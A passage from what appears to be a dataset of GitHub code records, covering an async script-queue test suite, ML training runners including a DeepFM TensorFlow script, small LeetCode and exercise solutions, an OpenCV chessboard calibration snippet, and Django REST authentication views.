self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n\n async def test_wait_queue_paused_when_queue_paused(self) -> None:\n self.logevent_queue.running = False\n\n await self.script_queue.wait_queue_paused()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_wait_queue_paused_when_queue_running(self) -> None:\n self.logevent_queue.running = True\n\n self.script_queue.long_timeout = 5.0\n\n with self.assertRaisesRegex(\n RuntimeError,\n expected_regex=f\"No queue event received in the last {self.script_queue.long_timeout}s.\",\n ):\n await self.script_queue.wait_queue_paused()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.long_timeout,\n )\n\n async def test_wait_queue_running_when_queue_paused(self) -> None:\n self.logevent_queue.running = False\n\n self.script_queue.long_timeout = 5.0\n\n with self.assertRaisesRegex(\n RuntimeError,\n expected_regex=f\"No queue event received in the last {self.script_queue.long_timeout}s.\",\n ):\n await self.script_queue.wait_queue_running()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.long_timeout,\n )\n\n async def test_wait_queue_running_when_queue_running(self) -> None:\n self.logevent_queue.running = True\n\n await self.script_queue.wait_queue_running()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_pause_when_running(self) -> None:\n self.logevent_queue.running = True\n\n await self.script_queue.pause()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.cmd_pause.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False, timeout=self.script_queue.long_timeout\n )\n\n async def test_pause_when_paused(self) -> None:\n self.logevent_queue.running = False\n\n await self.script_queue.pause()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_not_called()\n self.script_queue.rem.scriptqueue_1.cmd_pause.start.assert_not_awaited()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_resume_when_running(self) -> None:\n self.logevent_queue.running = True\n\n await self.script_queue.resume()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_not_called()\n self.script_queue.rem.scriptqueue_1.cmd_resume.start.assert_not_awaited()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_resume_when_paused(self) -> None:\n self.logevent_queue.running = False\n\n await self.script_queue.resume()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n\n self.script_queue.rem.scriptqueue_1.cmd_resume.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False, timeout=self.script_queue.long_timeout\n )\n\n assert self.logevent_queue.running\n\n def assert_get_script_schema_calls(self) -> None:\n self.script_queue.rem.scriptqueue_1.evt_configSchema.flush.assert_called_once()\n self.script_queue.rem.scriptqueue_1.cmd_showSchema.set_start.assert_awaited_with(\n isStandard=True,\n path=\"std_script1\",\n timeout=self.script_queue.long_timeout,\n )\n self.script_queue.rem.scriptqueue_1.evt_configSchema.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.long_timeout,\n )\n\n def assert_add(\n self,\n is_standard: bool,\n script: str,\n config: typing.Dict[str, typing.Any],\n description: str = \"\",\n log_level: int = logging.DEBUG,\n pause_checkpoint: str = \"\",\n ) -> None:\n self.script_queue.rem.scriptqueue_1.cmd_add.set_start.assert_awaited_with(\n isStandard=is_standard,\n path=script,\n config=yaml.safe_dump(config),\n descr=description,\n location=idl.enums.ScriptQueue.Location.LAST,\n logLevel=log_level,\n pauseCheckpoint=pause_checkpoint,\n timeout=self.script_queue.long_timeout,\n )\n\n async def script_queue_cmd_pause(\n self, *args: typing.Any, **kwargs: typing.Any\n ) -> None:\n asyncio.create_task(self._set_queue_state(False))\n\n async def script_queue_cmd_resume(\n self, *args: typing.Any, **kwargs: typing.Any\n ) -> None:\n asyncio.create_task(self._set_queue_state(True))\n\n async def get_logevent_queue(\n self, *args: typing.Any, **kwargs: typing.Any\n ) -> types.SimpleNamespace:\n await asyncio.sleep(1.0)\n return self.logevent_queue\n\n async def _set_queue_state(self, state: bool) -> None:\n await asyncio.sleep(2.0)\n self.logevent_queue.running = state\n","repo_name":"lsst-ts/ts_observatory_control","sub_path":"tests/test_script_queue.py","file_name":"test_script_queue.py","file_ext":"py","file_size_in_byte":14851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29777419247","text":"import os\nfrom datetime import datetime\nfrom typing import Any, Callable\n\nimport numpy as np # type: ignore\nimport pandas as pd # type: ignore\nfrom sklearn.pipeline import Pipeline # type: ignore\n\nfrom pipeline import run_models\nfrom pipeline.models.best_params_models import (\n create_mlp_best_params,\n create_rf_best_params,\n create_xgboost_best_params,\n create_logistic_regression_best_params,\n)\nfrom pipeline.models.utils import scoring\nfrom pipeline.models.utils.model_enum import Model\nfrom pipeline.preprocessing.compute_features.feature import FeatureList, Feature\n\nfrom pipeline.preprocessing.sk_formatter import SKFormatter\nfrom pipeline.run_models import get_prediction, save_metrics, save_skformatter_params\n\nModel_best = tuple[Model, Callable[[pd.DataFrame, pd.Series], Any]]\n\n\ndef runner(\n model_jobs: list[Model_best],\n train_formatter: SKFormatter,\n test_formatter: SKFormatter,\n) -> dict[str, pd.Series]:\n \"\"\"\n The runner, at a high-level, is responsible for:\n 1. Fitting the individual models of the model_jobs\n 2. Save the SKFormatter params along side the metrics of each model\n\n Args:\n model_jobs (list[Model]): Models for which to fit using existing best params\n train_formatter (SKFormatter): SKFormatter instance for formatting the training set\n test_formatter (SKFormatter): SKFormatter instance for formatting the test set\n Returns:\n dict[str, pd.Series]: dict mapping model name to its predictions.\n The predictions can be indexed by osm_id.\n \"\"\"\n\n # Obtain train and test data\n x_train, _, y_train, _ = train_formatter.generate_train_test_split()\n _, x_test, _, y_test = test_formatter.generate_train_test_split()\n\n date = datetime.today().strftime(\"%m_%d_%H_%M\")\n path = f\"/share-files/runs/{date}/{date}_\"\n\n # Generate folders and save header for metrics\n metrics_file = f\"{path}metrics\"\n os.makedirs(os.path.dirname(metrics_file), exist_ok=True)\n with open(metrics_file, \"a+\") as f:\n f.write(\"model,mae,mape,mse,rmse,r2,ev\\n\") # header for metrics\n\n # Save SKFormatter params\n save_skformatter_params(train_formatter.params, f\"{path}_skf_params\")\n\n # Test each of the best_models using params from earlier run\n predictions: dict[str, pd.Series] = {}\n for model_name, pipeline in model_jobs:\n # Fit model\n model = pipeline(x_train, y_train)\n\n # Test model\n y = get_prediction(model_name.value, model, x_test) # type: ignore\n predictions[str(model_name.value)] = y\n\n # Save metrics\n metrics = scoring.score_model(y_test, y)\n save_metrics(model_name.value, metrics, metrics_file)\n\n return predictions\n\n\ndef main():\n # define a list of models and their corresponding model using best params\n model_jobs: list[Model_best] = [\n (Model.MLP, create_mlp_best_params),\n (Model.RF, create_rf_best_params),\n (Model.XGB, create_xgboost_best_params),\n (Model.LOGREG, create_logistic_regression_best_params),\n # (Model.STATMODEL, statistical_model), # TODO: We do not have a StatModel yet\n ]\n\n train_format = SKFormatter(\n \"/share-files/pickle_files_features_and_ground_truth/2012.pkl\",\n test_size=0.0,\n discard_features=FeatureList(\n [\n Feature.OSM_ID,\n Feature.COORDINATES,\n Feature.DISTANCES,\n ]\n ),\n )\n\n test_format = SKFormatter(\n \"/share-files/pickle_files_features_and_ground_truth/2013.pkl\",\n test_size=1.0,\n discard_features=train_format.discard_features,\n )\n\n runner(model_jobs, train_format, test_format)\n\n # Run new GridSearch\n run_models.main()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SW8-Mobility/speed_limit_floating_car_data","sub_path":"pipeline/run_best_models.py","file_name":"run_best_models.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22450281736","text":"from typing import List\n\n\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n if len(nums) < 2:\n return 0\n cnt = left = 1\n right = nums[0]\n while right < len(nums) - 1:\n cnt += 1\n nxt = max(i + nums[i] for i in range(left, right + 1))\n left, right = right + 1, nxt\n return cnt\n","repo_name":"MtDeity/leetcode-python","sub_path":"Array/jump_game_ii.py","file_name":"jump_game_ii.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5725806524","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[56]:\n\n\n# Program 44 :- Alphabet \"W\"\ni = 0\nj = 3\nfor row in range(4):\n for col in range(7):\n if (col == 0 or col == 6) or (row == 1 and col == 4) or (row == 2 and col == 5) :\n print(\"*\", end = \"\")\n elif row == i and col == j:\n print(\"*\", end = \"\")\n i += 1\n j -= 1\n else:\n print(end =\" \")\n print(\"\\r\")\n\n","repo_name":"mohitrathore1807/Python_Codes","sub_path":"44. Alphabet \"W\".py","file_name":"44. Alphabet \"W\".py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"17899256188","text":"# Inspired by Self-Driving-Car Nano Degree from Udacity\n\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\n\nimage_path = os.path.join(os.getcwd(), \"../../samples/chess_boards/chess_board_0.png\")\n\nif not os.path.exists(image_path):\n print(\"Image does not exist!\")\n exit()\n\nnx = 8 # number of inside corners in x direction\nny = 6 # number of inside corners in y direction\n\nimg = cv2.imread(image_path)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\nif ret == True:\n cv2.drawChessboardCorners(img, (nx, ny), corners, ret)\n plt.imshow(img)\n plt.show()\n\n","repo_name":"eshanmherath/AV-Perception","sub_path":"image_processing/camera_calibrations/chess_board_method_0.py","file_name":"chess_board_method_0.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"4133926400","text":"class Solution:\n def subarraysDivByK(self, nums: List[int], k: int) -> int:\n n = len(nums)\n subarray_count = 0\n \n remainder_count = defaultdict(int)\n remainder_count[0] = 1\n nums.append(0)\n\n for index in range(n):\n nums[index] += nums[index-1]\n curr_remainder = nums[index] % k\n needed_remainder = (curr_remainder -k)%k\n subarray_count += remainder_count[needed_remainder]\n remainder_count[curr_remainder] += 1\n\n return subarray_count","repo_name":"NathanZlion/Competitive-Programming","sub_path":"0974-subarray-sums-divisible-by-k/0974-subarray-sums-divisible-by-k.py","file_name":"0974-subarray-sums-divisible-by-k.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"6170345096","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nu'''\nПроверить палиндромию двоичного числа.\nзаписано беззнаковое число произвольной длины в двоичной системе счисления\n0 -- если не палиндром, 1 -- если палиндром\n11011\n'''\nfrom __future__ import print_function\n\nnum = raw_input().strip()\ntmp = num[::-1]\nresult = 0\nif tmp == num:\n result = 1\nelse:\n result = 0\n\nprint(\"{0} {1}\".format(num, result))\n","repo_name":"LitRidl/checker-content","sub_path":"contlab5/26/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28647398826","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth import logout\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework import mixins\nfrom drf_spectacular.utils import (\n extend_schema,\n extend_schema_view,\n OpenApiResponse,\n)\n\nfrom pinakes.common.auth.keycloak_django.clients import get_oidc_client\nfrom pinakes.main.auth import serializers\n\n\n@extend_schema_view(\n retrieve=extend_schema(\n description=\"Get the current login user\",\n tags=[\"auth\"],\n operation_id=\"me_retrieve\",\n ),\n)\nclass CurrentUserViewSet(viewsets.GenericViewSet, mixins.RetrieveModelMixin):\n permission_classes = (IsAuthenticated,)\n serializer_class = serializers.CurrentUserSerializer\n model = get_user_model()\n\n def get_object(self):\n return self.request.user\n\n\nclass SessionLogoutView(APIView):\n permission_classes = (IsAuthenticated,)\n\n @extend_schema(\n description=\"Logout current session\",\n tags=[\"auth\"],\n operation_id=\"logout_create\",\n request=None,\n responses={\n status.HTTP_204_NO_CONTENT: OpenApiResponse(\n description=\"Logout successful\"\n )\n },\n )\n def post(self, request):\n get_social_user = getattr(\n request.successful_authenticator, \"get_social_user\", None\n )\n if get_social_user is None:\n return Response(\n data={\n \"detail\": _(\"Logout is not supported with Bearer auth.\")\n },\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n extra_data = get_social_user(request).extra_data\n openid_client = get_oidc_client()\n openid_client.logout_user_session(\n extra_data[\"access_token\"], extra_data[\"refresh_token\"]\n )\n logout(request)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"ansible/pinakes","sub_path":"pinakes/main/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"35148434729","text":"import pandas as pd\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport time\r\npd.set_option('display.max_columns', 100) # 设置最大显示列数\r\n\r\nTRAIN_FILE = \"D:\\\\data\\\\input\\\\tl\\\\trainData.csv\"\r\nTEST_FILE = \"D:\\\\data\\\\input\\\\tl\\\\testData.csv\"\r\nmodel_path=\"d:/data/input/tl/model/dfm/\"\r\nfdict_path = \"d:/data/input/tl/feature_dict\"\r\n\r\n# target|clickDate|uid|newsid|pos|app_version|device_vendor|netmodel|osversion|lng|lat|device_version|date|hour|minute|level|personidentification|followscore|personalscore|gender|delaySecond\r\nNUMERIC_COLS = [\"date\",\"hour\",\"minute\"]\r\nIGNORE_COLS = [\"lng\",\"lat\", \"target\",\"clickDate\" ,\"followscore\",\"personalscore\",\"delaySecond\" ,\"deviceid\",\"trguid\",\"guid\"]\r\n# NUMERIC_COLS = [\"lng\",\"lat\",\"date\",\"hour\",\"minute\", \"level\",\"followscore\",\"personalscore\",\"gender\",\"delaySecond\"]\r\n# IGNORE_COLS = [\"lng\",\"lat\", \"target\",\"clickDate\" ,\"followscore\",\"personalscore\"]\r\ntrain_num=10000000\r\n\"\"\"模型参数\"\"\"\r\ndfm_params = {\r\n \"decay\": 0.9,\r\n \"learn_rate_step\":13117, #喂入多少轮BATCH_SIZE后,更新一次学习率,一般设为:总样本数/BATCH_SIZE 13117 8238\r\n \"threads\":6,\r\n \"use_fm\": True,\r\n \"use_deep\": True,\r\n \"embedding_size\": 10,\r\n \"dropout_fm\": [1.0, 1.0],\r\n \"deep_layers\": [32, 32],\r\n \"dropout_deep\": [0.5, 0.5, 0.5],\r\n \"deep_layer_activation\": tf.nn.relu,\r\n \"epoch\": 20,\r\n \"batch_size\": 1024,\r\n \"learning_rate\": 0.01,\r\n # \"learning_rate\":0.001, 0.1-1 0.01-10 0.002-10 0.001-10(然loss从2变3了,似乎是个别异常数据拉高的)\r\n \"optimizer\": \"adam\",\r\n \"batch_norm\": 1,\r\n \"batch_norm_decay\": 0.995,\r\n \"l2_reg\": 0.01,\r\n \"verbose\": True,\r\n \"eval_metric\": 'gini_norm',\r\n \"random_seed\": 3\r\n}\r\n\r\ndfTrain = pd.read_csv(TRAIN_FILE)#.head(10)\r\ndfTest = pd.read_csv(TEST_FILE)#.head(10)\r\ndfDict= pd.concat([dfTest, dfTrain], ignore_index=True)\r\nprint(dfTrain.head(5))\r\n\r\ndata_rows=len(dfTrain)\r\n\r\nfeature_dict = {}\r\ntotal_feature = 0\r\nfor col in dfDict.columns:\r\n if col in IGNORE_COLS:\r\n continue\r\n elif col in NUMERIC_COLS:\r\n feature_dict[col] = total_feature\r\n total_feature += 1\r\n else:\r\n unique_val = dfDict[col].unique()\r\n feature_dict[col] = dict(zip(unique_val,range(total_feature,len(unique_val) + total_feature)))\r\n total_feature += len(unique_val)\r\nprint(total_feature)\r\n# with open(fdict_path, 'w+') as f:\r\n# f.write(str(feature_dict) )\r\n\r\ndef norm_itemID(feat_dict,item_df):\r\n f_index=[]\r\n f_value=[]\r\n for i in item_df.index:\r\n item=item_df.iloc[i,:]\r\n itemID=item[0]\r\n penalty=item[1]\r\n genre = item[2]\r\n artistid = item[3]\r\n singertype= item[4]\r\n region= item[5]\r\n # f_value.append([1, 1, 1, penalty, 1, 1])\r\n # f_index.append( [ feat_dict['itemID'][itemID], 0,0, feat_dict['penalty'], feat_dict['genre'][genre], feat_dict['artistid'][artistid] ] )\r\n f_value.append([1,1, 1, 1, penalty, 1,1, 1, 1, 1])\r\n f_index.append( [0, feat_dict['artistid'][artistid],feat_dict['itemID'][itemID], 0, feat_dict['penalty'], 0,0, feat_dict['genre'][genre], feat_dict['singertype'][singertype], feat_dict['region'][region] ] )\r\n return f_index,f_value\r\n\r\ndef norm_f_index(feat_dict, uid_country, f_index):\r\n # itemID country uId penalty genre artistid\r\n # uId artistid itemID country penalty ua appversion genre singertype region\r\n uid=uid_country[0]\r\n country=uid_country[1]\r\n ua=uid_country[2]\r\n appversion=uid_country[3]\r\n user_index=feat_dict['uId'][uid]\r\n country_index=feat_dict['country'][country]\r\n # 要是能直接改两列的值为用户信息就好了\r\n for v in f_index:\r\n # v[1]=country_index\r\n # v[2]=user_index\r\n v[3]=country_index\r\n v[0]=user_index\r\n v[5]=ua\r\n v[6]=appversion\r\n return f_index\r\n\r\n# f_index,f_value=norm_itemID(feature_dict, item_df)\r\n\r\n\"\"\"\r\n对训练集进行转化,可截取前一半训练,后一半测试,但id都要记录到字典\r\n\"\"\"\r\ntrain_y = dfTrain[['target']]#.values.tolist()\r\ntrain_feature_index = dfTrain.copy()\r\ntrain_feature_value = dfTrain.copy()\r\n# train_y = dfTrain[['target']].tail(train_num).values.tolist()\r\n# train_feature_index = dfTrain.tail(train_num).copy()\r\n# train_feature_value = dfTrain.tail(train_num).copy()\r\n\r\nfor col in train_feature_index.columns:\r\n if col in IGNORE_COLS:\r\n train_feature_index.drop(col,axis=1,inplace=True)\r\n train_feature_value.drop(col,axis=1,inplace=True)\r\n continue\r\n elif col in NUMERIC_COLS:\r\n train_feature_index[col] = feature_dict[col]\r\n else:\r\n train_feature_index[col] = train_feature_index[col].map(feature_dict[col])\r\n train_feature_value[col] = 1\r\nprint(train_feature_index.head(5))\r\nprint(train_feature_value.head(5))\r\nprint(train_feature_index.tail(5))\r\nprint(train_feature_value.tail(5))\r\n\r\ndfm_params['feature_size'] = total_feature # 254\r\ndfm_params['field_size'] = len(train_feature_index.columns) # 37\r\nprint(len(train_feature_index.columns))\r\n\r\ndef get_batch(train_feature_index,train_feature_value,train_y, batch_size):\r\n with tf.device('/cpu:0'):\r\n print(len(train_feature_index),len(train_y))\r\n input_queue = tf.train.slice_input_producer([train_feature_index,train_feature_value,train_y],num_epochs=dfm_params['epoch'], shuffle=True )\r\n i_batch, v_batch, label_batch = tf.train.batch(input_queue, batch_size=batch_size, num_threads=dfm_params['threads'], capacity=32, allow_smaller_final_batch=False)\r\n print(v_batch)\r\n return i_batch, v_batch,label_batch\r\ndef data_generator(train_feature_index,train_feature_value,train_y):\r\n # dataset = np.array( train_feature_index )\r\n print(type(train_feature_index),type(train_feature_value),type(train_y))\r\n dataset = np.array( pd.concat([train_feature_index, train_feature_value,train_y],axis=1) )\r\n for d in dataset:\r\n # print(d)\r\n # print(d[0:14])\r\n # print(d[14:28])\r\n # print(d[28])\r\n yield d[0:14],d[14:28],d[28]\r\n\r\ndataset = tf.data.Dataset.from_generator( lambda:data_generator(train_feature_index,train_feature_value,train_y), ( tf.int32, tf.float32, tf.float32), (tf.TensorShape([14,]), tf.TensorShape([14,]), tf.TensorShape([]) ))\r\ndataset = dataset.repeat(dfm_params['epoch'])\r\ndataset = dataset.batch(dfm_params['batch_size'])\r\niterator = dataset.make_one_shot_iterator()\r\none_element = iterator.get_next()\r\n\r\n\"\"\"开始建立模型\"\"\"\r\nfeat_index = tf.placeholder(tf.int32, shape=[None, None], name='feat_index')\r\nfeat_value = tf.placeholder(tf.float32, shape=[None, None], name='feat_value')\r\n\r\nlabel = tf.placeholder(tf.float32, shape=[None, 1], name='label')\r\n\r\n\"\"\"建立weights\"\"\"\r\nweights = dict()\r\n\r\n# embeddings\r\nweights['feature_embeddings'] = tf.Variable(\r\n tf.random_normal([dfm_params['feature_size'], dfm_params['embedding_size']], 0.0, 0.01),\r\n name='feature_embeddings')\r\nweights['feature_bias'] = tf.Variable(tf.random_normal([dfm_params['feature_size'], 1], 0.0, 1.0), name='feature_bias')\r\n\r\n# deep layers\r\nnum_layer = len(dfm_params['deep_layers'])\r\ninput_size = dfm_params['field_size'] * dfm_params['embedding_size']\r\nglorot = np.sqrt(2.0 / (input_size + dfm_params['deep_layers'][0]))\r\n\r\nweights['layer_0'] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(input_size, dfm_params['deep_layers'][0])), dtype=np.float32\r\n)\r\nweights['bias_0'] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(1, dfm_params['deep_layers'][0])), dtype=np.float32\r\n)\r\n\r\nfor i in range(1, num_layer):\r\n glorot = np.sqrt(2.0 / (dfm_params['deep_layers'][i - 1] + dfm_params['deep_layers'][i]))\r\n weights[\"layer_%d\" % i] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(dfm_params['deep_layers'][i - 1], dfm_params['deep_layers'][i])),\r\n dtype=np.float32) # layers[i-1] * layers[i]\r\n weights[\"bias_%d\" % i] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(1, dfm_params['deep_layers'][i])),\r\n dtype=np.float32) # 1 * layer[i]\r\n\r\n# final concat projection layer\r\n\r\nif dfm_params['use_fm'] and dfm_params['use_deep']:\r\n input_size = dfm_params['field_size'] + dfm_params['embedding_size'] + dfm_params['deep_layers'][-1]\r\nelif dfm_params['use_fm']:\r\n input_size = dfm_params['field_size'] + dfm_params['embedding_size']\r\nelif dfm_params['use_deep']:\r\n input_size = dfm_params['deep_layers'][-1]\r\n\r\nglorot = np.sqrt(2.0 / (input_size + 1))\r\nweights['concat_projection'] = tf.Variable(np.random.normal(loc=0, scale=glorot, size=(input_size, 1)),\r\n dtype=np.float32, name='concat_projection')\r\nweights['concat_bias'] = tf.Variable(tf.constant(0.01), dtype=np.float32, name='concat_bias')\r\n\r\n\"\"\"embedding\"\"\"\r\nembeddings = tf.nn.embedding_lookup(weights['feature_embeddings'], feat_index)\r\n\r\nreshaped_feat_value = tf.reshape(feat_value, shape=[-1, dfm_params['field_size'], 1])\r\n\r\nembeddings = tf.multiply(embeddings, reshaped_feat_value)\r\n\r\n\"\"\"fm part\"\"\"\r\nfm_first_order = tf.nn.embedding_lookup(weights['feature_bias'], feat_index)\r\nfm_first_order = tf.reduce_sum(tf.multiply(fm_first_order, reshaped_feat_value), 2)\r\n\r\nsummed_features_emb = tf.reduce_sum(embeddings, 1)\r\nsummed_features_emb_square = tf.square(summed_features_emb)\r\n\r\nsquared_features_emb = tf.square(embeddings)\r\nsquared_sum_features_emb = tf.reduce_sum(squared_features_emb, 1)\r\n\r\nfm_second_order = 0.5 * tf.subtract(summed_features_emb_square, squared_sum_features_emb)\r\n\r\n\"\"\"deep part\"\"\"\r\ny_deep = tf.reshape(embeddings, shape=[-1, dfm_params['field_size'] * dfm_params['embedding_size']])\r\n\r\nfor i in range(0, len(dfm_params['deep_layers'])):\r\n y_deep = tf.add(tf.matmul(y_deep, weights[\"layer_%d\" % i]), weights[\"bias_%d\" % i])\r\n y_deep = tf.nn.relu(y_deep)\r\n\r\n\"\"\"final layer\"\"\"\r\nif dfm_params['use_fm'] and dfm_params['use_deep']:\r\n concat_input = tf.concat([fm_first_order, fm_second_order, y_deep], axis=1)\r\nelif dfm_params['use_fm']:\r\n concat_input = tf.concat([fm_first_order, fm_second_order], axis=1)\r\nelif dfm_params['use_deep']:\r\n concat_input = y_deep\r\n\r\n# item_index = tf.slice(feat_index,[0,0],[label.shape], name='item_index')\r\nout = tf.nn.sigmoid(tf.add(tf.matmul(concat_input, weights['concat_projection']), weights['concat_bias']) ,name=\"out\")\r\noutpre = tf.concat([out, label],1 ,name=\"outpre\")\r\n\r\n\"\"\"loss and optimizer\"\"\"\r\nglobal_step = tf.Variable(0, trainable=False)\r\nlearning_rate = tf.train.exponential_decay(dfm_params['learning_rate'], global_step,dfm_params['learn_rate_step'], dfm_params['decay'], staircase=True)\r\nloss = tf.losses.log_loss(tf.reshape(label, (-1, 1)), out)\r\noptimizer = tf.train.AdamOptimizer(learning_rate=dfm_params['learning_rate'], beta1=0.9, beta2=0.999,epsilon=1e-8).minimize(loss,global_step=global_step)\r\n\r\n# i_batch, v_batch, label_batch = get_batch(train_feature_index,train_feature_value,train_y.values.tolist(), dfm_params['batch_size'])\r\n\r\ndef getAuc(predict_playNum):\r\n p=[]\r\n n=[]\r\n count=0\r\n for i in predict_playNum.index:\r\n row = predict_playNum.iloc[i, :]\r\n if row[1]>=1:\r\n p.append(row[0])\r\n else:\r\n n.append(row[0])\r\n for rowp in p:\r\n for rown in n:\r\n if rowp>rown:\r\n count=count+1\r\n return count / (len(p)*len(n))\r\n\r\n\"\"\"train\"\"\"\r\ngpu_config = tf.ConfigProto(device_count={'GPU': 0, 'CPU': 6} )\r\n# gpu_config = tf.ConfigProto()\r\ngpu_config.gpu_options.allow_growth = True\r\ngpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\r\nconfig=tf.ConfigProto(gpu_options=gpu_options)\r\nwith tf.Session(config=config) as sess:\r\n writer = tf.summary.FileWriter(\"D:\\\\Anaconda3\\\\Scripts\\\\logs\", sess.graph)\r\n sess.run(tf.global_variables_initializer())\r\n sess.run(tf.local_variables_initializer())\r\n # 开启协调器\r\n coord = tf.train.Coordinator()\r\n # 使用start_queue_runners 启动队列填充\r\n threads = tf.train.start_queue_runners(sess, coord)\r\n batch= int(data_rows / dfm_params['batch_size'])\r\n print(data_rows , dfm_params['batch_size'],batch)\r\n batch_x_epochs = 0 # global_step\r\n end_loss=0\r\n tf.train.Saver().restore(sess, save_path=model_path)\r\n print('strat training... ',time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))\r\n try:\r\n while not coord.should_stop(): # batch= int(data_rows / dfm_params['batch_size']) 9000\r\n # 获取训练用的每一个batch中batch_size个样本和标签\r\n\r\n # i, v, l = sess.run([i_batch, v_batch, label_batch])\r\n # predict_label = sess.run([outpre], feed_dict={feat_value: v, feat_index: i, label: l})\r\n # recDf=pd.DataFrame(predict_label[0],columns=['score','playNum'])\r\n # print(getAuc(recDf))\r\n # recDf.to_csv(rec_path+'dfmRec'+ str(batch_x_epochs), index=False, header=True)\r\n # # if batch_x_epochs % 100 == 0 and batch_x_epochs!=0:\r\n\r\n # i, v, l = sess.run([i_batch, v_batch, label_batch])\r\n i, v, l = sess.run(one_element)\r\n # print('index: ',i)\r\n # print( 'value: ',v)\r\n # print('label: ', l)\r\n # print(i.shape)\r\n sess.run(optimizer, feed_dict={feat_index: i, feat_value: v, label: l.reshape(dfm_params['batch_size'],1) })\r\n train_loss = loss.eval({feat_index: i, feat_value: v, label: l.reshape(dfm_params['batch_size'],1)})\r\n end_loss=train_loss\r\n # if batch_x_epochs % 200 == 0 and batch_x_epochs!=0:\r\n if batch_x_epochs % 600 == 0:\r\n learning_rate_val = sess.run(learning_rate)\r\n global_step_val = sess.run(global_step)\r\n # print('label',l )\r\n print(\"batch_x_epochs %d, Training loss %g, global_step %g, learning_rate %g, at %s\" % (batch_x_epochs, train_loss, global_step_val,learning_rate_val, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) ))\r\n tf.train.Saver().save(sess, save_path=model_path)\r\n frozen_graph_def = tf.graph_util.convert_variables_to_constants(\r\n sess,\r\n sess.graph_def,\r\n [\"feat_index\", 